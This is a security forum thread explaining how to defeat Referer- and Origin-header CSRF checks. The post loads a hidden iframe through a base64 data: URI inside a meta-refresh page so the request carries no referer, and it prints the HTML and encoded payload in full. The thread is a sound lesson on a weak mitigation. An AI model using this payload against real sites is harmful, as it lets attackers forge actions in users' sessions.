Results 1 to 3 of 3

Thread: Bypassing CSRF protection that uses Refer and Source headers . Share/Save - My123World.Com!

  1. #1
    Security Researcher fb1h2s's Avatar
    Join Date
    Jul 2010
    Location
    India
    Posts
    616
    Blog Entries
    32

    Bypassing CSRF protection that uses Refer and Source headers .

    I have seen developers relying on using HTTP referer header as a method of mitigating CSRF. One of the reason is that it is proposed in the OWASP
    CSRF mitigation techniques. Even though the article clearly says that trusting reffer is not the right idea to mitigate this issue.
    https://www.owasp.org/index.php/Cros...Referer_Header. Also I have seen using orgin header to detect CSRF .

    Note: Http referer header would be removed when request is made from https site to http and vise verse.

    The following code checks whether HTTP_REFERER header is present , if present it will check if the current host equals refer host .If they both are not same then CSRF alert . Why mandate HTTP_REFERER header, because first GET request would never have referer .
    ref


    PHP Code:
    if(isset($_SERVER['HTTP_REFERER'], $_SERVER['HTTP_HOST']))
    if(
    parse_url($_SERVER['HTTP_REFERER'], PHP_URL_HOST)!=$_SERVER['HTTP_HOST'])
    exit(
    'Anti-CSRF mechanism!'); 
    So with the above I won't be able to directly iframe the page , since frame request would have parent referer headers.

    But this CSRF protection could be easily bypassed . The attacker only have to use any technique that would make him sent a request without referer header.

    All we need to do is load the iframe from data: uri. Now the iframe would not have a parent, so no headers would be added.

    <!DOCTYPE html>
    <html>
    <body>
    <iframe src="https://target-server.com" style="display:none;">
    </iframe>
    </body>
    </html>

    Base64 encode it and load it inside http-equiv="Refresh".

    data:text/html;charset=utf-8;base64,PCFET0NUWVBFIGh0bWw+DQo8aHRtbD4NCjxib2R5P g0KPGlmcmFtZSBzcmM9Imh0dHBzOi8vdGFyZ2V0LXNlcnZlci5 jb20iIHN0eWxlPSJkaXNwbGF5Om5vbmU7Ij4NCjwvaWZyYW1lP g0KPC9ib2R5Pg0KPC9odG1sPg==


    <!DOCTYPE html>
    <html>
    <head>
    <meta http-equiv="Refresh" content="2;url=data:text/html;charset=utf-8;base64,PCFET0NUWVBFIGh0bWw+DQo8aHRtbD4NCjxib2R5P g0KPGlmcmFtZSBzcmM9Imh0dHBzOi8vdGFyZ2V0LXNlcnZlci5 jb20iIHN0eWxlPSJkaXNwbGF5Om5vbmU7Ij4NCjwvaWZyYW1lP g0KPC9ib2R5Pg0KPC9odG1sPg==">

    </head>

    <body>

    And we would successfully bypass referer and origin based csrf protections.

    Regards,

    Rahul Sasi
    Hacking Is a Matter of Time Knowledge and Patience

  2. #2
    Webapp Secninja
    Join Date
    Aug 2012
    Location
    Ranchi, Jharkhand
    Posts
    41
    Blog Entries
    2
    What if the web application rejects empty or blank referrers and X-FRAME-OPTIONS is set to DENY ?
    Hacking Wacking Sab Moh Maya Hai
    To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts.

  3. #3
    Security Researcher fb1h2s's Avatar
    Join Date
    Jul 2010
    Location
    India
    Posts
    616
    Blog Entries
    32
    You can only reject blank referrers in POST request , not possible in GET request as the first request to the pages would obviously not have referrer. Else the will have to maintain the state in session an recognize the first request.
    Hacking Is a Matter of Time Knowledge and Patience

Tags for this Thread

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •